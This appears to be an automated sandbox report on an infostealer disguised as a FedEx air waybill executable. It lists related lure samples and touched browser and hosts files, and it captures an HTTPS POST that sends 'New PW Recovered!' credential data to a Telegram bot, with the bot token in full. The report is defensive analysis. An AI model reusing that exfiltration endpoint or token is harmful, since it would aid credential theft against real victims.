                                    Show All
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 92.122.145.220
                                    • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    18:48:26API Interceptor788x Sleep call for process: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    149.154.167.220ORDER #63457-BLS.exeGet hashmaliciousBrowse
                                      TmVqivwYxc.exeGet hashmaliciousBrowse
                                        Purchase Order.exeGet hashmaliciousBrowse
                                          FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeGet hashmaliciousBrowse
                                            LNdP6FAphu.exeGet hashmaliciousBrowse
                                              ORDER #63457-BLS.exeGet hashmaliciousBrowse
                                                Ordine_di_acquisto_6010921doc.vbsGet hashmaliciousBrowse
                                                  AsWdTqKLGU.exeGet hashmaliciousBrowse
                                                    Sales Order Confirmation.exeGet hashmaliciousBrowse
                                                      FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeGet hashmaliciousBrowse
                                                        wz7FRFwqp8.exeGet hashmaliciousBrowse
                                                          order.exeGet hashmaliciousBrowse
                                                            URGENT ORDER.vbsGet hashmaliciousBrowse
                                                              HSBC Payment Advice - Customer REF A0019G1109_100182.exeGet hashmaliciousBrowse
                                                                quote.exeGet hashmaliciousBrowse
                                                                  Quote request 2295.exeGet hashmaliciousBrowse
                                                                    Payment-Copy22112021.exeGet hashmaliciousBrowse
                                                                      Order_172PDF.exeGet hashmaliciousBrowse
                                                                        NEW ORDER FROM CANADA.vbsGet hashmaliciousBrowse
                                                                          HSBC Payment Advice - Customer REF A0019G1109_100182.exeGet hashmaliciousBrowse

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            api.telegram.org20211125 CIRCULAR ANULACION CUENTA BANCARIA BANKIA.xlsxGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            ORDER #63457-BLS.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            TmVqivwYxc.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Purchase Order.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            LNdP6FAphu.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            ORDER #63457-BLS.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Ordine_di_acquisto_6010921doc.vbsGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            AsWdTqKLGU.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            20211118 CIRCULAR ANULACION CUENTA BANCARIA BANKIA.xlsxGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            DHL OVERDUE PAYMENT FILE 1041.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Sales Order Confirmation.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            wz7FRFwqp8.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            order.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            URGENT ORDER.vbsGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            HSBC Payment Advice - Customer REF A0019G1109_100182.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            quote.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Quote request 2295.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Payment-Copy22112021.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220

                                                                            ASN

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            TELEGRAMRUTk6dsSEyOC.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            ORDER #63457-BLS.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            TmVqivwYxc.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            3E8869030B9C89B8C43E9F8A6730A516E3945AB1272E3.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            Purchase Order.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            LNdP6FAphu.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            dIVWfjBCXV.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            UYsk9P766s.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            ORDER #63457-BLS.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            F06FA33D36606CF5A9DD11FE35348EB6A3E8871367CE4.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            Ordine_di_acquisto_6010921doc.vbsGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            AsWdTqKLGU.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Sales Order Confirmation.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            wz7FRFwqp8.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            order.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            URGENT ORDER.vbsGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            HSBC Payment Advice - Customer REF A0019G1109_100182.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            zMvP34LhcZ.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            3b5074b1b5d032e5620f69f9f700ff0e#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            DHL_119040 ontvangstbewijs,pdf.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            ORDER #63457-BLS.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            TmVqivwYxc.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            g3g1VECs9K.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.ArtemisEC35A67F3663.5978.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Purchase Order.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Waldo Orden de Compra -SA112421,pdf.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            PROPOSAL CATALOG.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            LNdP6FAphu.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Zkb2VENJ38.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            ORDER 759325.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            pH7pQDWJPP.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            oZPv3ngzrx.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            a.dllGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            NEW PURCHASE ORDER,PDF.EXEGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            qG92QcOmb4.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            CheatValorant2.2.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            New Order.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.log
                                                                            Process:C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2239
                                                                            Entropy (8bit):5.354287817410997
                                                                            Encrypted:false
                                                                            SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                                                                            MD5:913D1EEA179415C6D08FB255AE42B99D
                                                                            SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                                                                            SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                                                                            SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                                                                            Malicious:true
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                            C:\Users\user\AppData\Roaming\becfyxbg.kps\Chrome\Default\Cookies
                                                                            Process:C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                            Category:modified
                                                                            Size (bytes):20480
                                                                            Entropy (8bit):0.698304057893793
                                                                            Encrypted:false
                                                                            SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                                            MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                                            SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                                            SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                                            SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Windows\System32\drivers\etc\hosts
                                                                            Process:C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):835
                                                                            Entropy (8bit):4.694294591169137
                                                                            Encrypted:false
                                                                            SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                                                            MD5:6EB47C1CF858E25486E42440074917F2
                                                                            SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                                                            SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                                                            SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                                                            Malicious:true
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: # Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.874907024171262
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            File name:FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            File size:517120
                                                                            MD5:994f1f286b24022af59bc5506b1e2871
                                                                            SHA1:ed961648e2e90a311a9c5e53c15eed3d95853b96
                                                                            SHA256:edd31cd4c64b1d9f392c6e141a10c028cb11f9640e6eab34960baf6bdd585dc5
                                                                            SHA512:532a74ac29dc23ff20c802ab9db472f793379bb81c9041cb0e7488f692861a2902bffe71814917db0338abb25544146c21cc9934630825817f437576a8ba4324
                                                                            SSDEEP:12288:ZN70vixBFmJ55wqgO/hUaXOjBhpSYyCiApDAvYNo:z70vi1ObgO/haBwWNo
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...jE.a..............0.............Z.... ........@.. .......................@............@................................

                                                                            File Icon

                                                                            Icon Hash:00828e8e8686b000

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x47f95a
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                            Time Stamp:0x619F456A [Thu Nov 25 08:12:26 2021 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:v4.0.30319
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [ebp+0800000Eh], ch
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x7f9080x4f.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000x5bc.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x820000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x20000x7d9700x7da00False0.900664645522data7.88525497927IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x800000x5bc0x600False0.430338541667data4.13854845125IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x820000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountry
                                                                            RT_VERSION0x800900x32cdata
                                                                            RT_MANIFEST0x803cc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                            Imports

                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain

                                                                            Version Infos

                                                                            DescriptionData
                                                                            Translation0x0000 0x04b0
                                                                            LegalCopyrightCopyright Rogers Peet
                                                                            Assembly Version8.0.6.0
                                                                            InternalNameDESCKI.exe
                                                                            FileVersion5.6.0.0
                                                                            CompanyNameRogers Peet
                                                                            LegalTrademarks
                                                                            Comments
                                                                            ProductNameBiblan
                                                                            ProductVersion5.6.0.0
                                                                            FileDescriptionBiblan
                                                                            OriginalFilenameDESCKI.exe

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 25, 2021 18:50:16.754606009 CET49812443192.168.2.5149.154.167.220
                                                                            Nov 25, 2021 18:50:16.754653931 CET44349812149.154.167.220192.168.2.5
                                                                            Nov 25, 2021 18:50:16.754739046 CET49812443192.168.2.5149.154.167.220
                                                                            Nov 25, 2021 18:50:16.826662064 CET49812443192.168.2.5149.154.167.220
                                                                            Nov 25, 2021 18:50:16.826689959 CET44349812149.154.167.220192.168.2.5
                                                                            Nov 25, 2021 18:50:16.901915073 CET44349812149.154.167.220192.168.2.5
                                                                            Nov 25, 2021 18:50:16.902096987 CET49812443192.168.2.5149.154.167.220
                                                                            Nov 25, 2021 18:50:16.907088995 CET49812443192.168.2.5149.154.167.220
                                                                            Nov 25, 2021 18:50:16.907105923 CET44349812149.154.167.220192.168.2.5
                                                                            Nov 25, 2021 18:50:16.907546997 CET44349812149.154.167.220192.168.2.5
                                                                            Nov 25, 2021 18:50:16.947648048 CET49812443192.168.2.5149.154.167.220
                                                                            Nov 25, 2021 18:50:18.371007919 CET49812443192.168.2.5149.154.167.220
                                                                            Nov 25, 2021 18:50:18.398168087 CET44349812149.154.167.220192.168.2.5
                                                                            Nov 25, 2021 18:50:18.401303053 CET49812443192.168.2.5149.154.167.220
                                                                            Nov 25, 2021 18:50:18.448870897 CET44349812149.154.167.220192.168.2.5
                                                                            Nov 25, 2021 18:50:18.482965946 CET44349812149.154.167.220192.168.2.5
                                                                            Nov 25, 2021 18:50:18.483073950 CET44349812149.154.167.220192.168.2.5
                                                                            Nov 25, 2021 18:50:18.483330011 CET49812443192.168.2.5149.154.167.220
                                                                            Nov 25, 2021 18:50:18.484544992 CET49812443192.168.2.5149.154.167.220
                                                                            Nov 25, 2021 18:50:20.019704103 CET49814443192.168.2.5149.154.167.220
                                                                            Nov 25, 2021 18:50:20.019757986 CET44349814149.154.167.220192.168.2.5
                                                                            Nov 25, 2021 18:50:20.019880056 CET49814443192.168.2.5149.154.167.220
                                                                            Nov 25, 2021 18:50:20.020394087 CET49814443192.168.2.5149.154.167.220
                                                                            Nov 25, 2021 18:50:20.020417929 CET44349814149.154.167.220192.168.2.5
                                                                            Nov 25, 2021 18:50:20.079303026 CET44349814149.154.167.220192.168.2.5
                                                                            Nov 25, 2021 18:50:20.083409071 CET49814443192.168.2.5149.154.167.220
                                                                            Nov 25, 2021 18:50:20.083462000 CET44349814149.154.167.220192.168.2.5
                                                                            Nov 25, 2021 18:50:20.133424044 CET44349814149.154.167.220192.168.2.5
                                                                            Nov 25, 2021 18:50:20.135560036 CET49814443192.168.2.5149.154.167.220
                                                                            Nov 25, 2021 18:50:20.135613918 CET44349814149.154.167.220192.168.2.5
                                                                            Nov 25, 2021 18:50:20.295952082 CET44349814149.154.167.220192.168.2.5
                                                                            Nov 25, 2021 18:50:20.296042919 CET44349814149.154.167.220192.168.2.5
                                                                            Nov 25, 2021 18:50:20.296165943 CET49814443192.168.2.5149.154.167.220
                                                                            Nov 25, 2021 18:50:20.296937943 CET49814443192.168.2.5149.154.167.220

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 25, 2021 18:50:16.611881018 CET6007553192.168.2.58.8.8.8
                                                                            Nov 25, 2021 18:50:16.644406080 CET53600758.8.8.8192.168.2.5
                                                                            Nov 25, 2021 18:50:19.986143112 CET6434553192.168.2.58.8.8.8
                                                                            Nov 25, 2021 18:50:20.018466949 CET53643458.8.8.8192.168.2.5

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            Nov 25, 2021 18:50:16.611881018 CET192.168.2.58.8.8.80x2e90Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                            Nov 25, 2021 18:50:19.986143112 CET192.168.2.58.8.8.80xd69Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            Nov 25, 2021 18:50:16.644406080 CET8.8.8.8192.168.2.50x2e90No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                            Nov 25, 2021 18:50:20.018466949 CET8.8.8.8192.168.2.50xd69No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • api.telegram.org

                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.549812149.154.167.220443C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            2021-11-25 17:50:18 UTC0OUTPOST /bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument HTTP/1.1
                                                                            Content-Type: multipart/form-data; boundary=---------------------------8d9b05ed69793f6
                                                                            Host: api.telegram.org
                                                                            Content-Length: 1014
                                                                            Expect: 100-continue
                                                                            Connection: Keep-Alive
                                                                            2021-11-25 17:50:18 UTC0INHTTP/1.1 100 Continue
                                                                            2021-11-25 17:50:18 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 62 30 35 65 64 36 39 37 39 33 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 37 34 38 31 32 37 35 38 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 62 30 35 65 64 36 39 37 39 33 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 61 6c 66 6f 6e 73 2f 31 32 38 37 35 37 0a 4f 53 46 75 6c
                                                                            Data Ascii: -----------------------------8d9b05ed69793f6Content-Disposition: form-data; name="chat_id"1748127586-----------------------------8d9b05ed69793f6Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/128757OSFul
                                                                            2021-11-25 17:50:18 UTC1INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 25 Nov 2021 17:50:18 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 618
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
